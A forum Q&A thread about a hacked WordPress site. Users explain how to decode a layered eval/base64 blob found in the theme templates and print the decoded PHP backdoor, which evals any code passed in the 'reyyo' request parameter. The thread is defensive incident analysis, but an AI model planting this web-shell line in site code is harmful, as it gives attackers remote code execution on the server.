One of my friend's wordpress website is hacked by someone and they put the following code on the header of all template files.
I tried to decode it with base64 decoder. But the output looks odd. Can you guys tell me what type of encoding is this?
It's a series of eval+base64 encryption. After decoding, the code would be:
if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));
Here's how I got that:
\/\*.*?\*\/ as the search pattern, and replace with '' (empty string)eval() stattements. Change that to echo.Basically this code will allow the attacker to inject and execute arbitrary code on your website.
Easiest way to do this is to remove all comments (/* */) with regex, and then replace eval() with echo(). Rinse and repeat.
After two or three loops, it outputs the following:
if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));
Which means that it will eval() anything passed as reyyo in either $_GET, $_POST or $_COOKIE.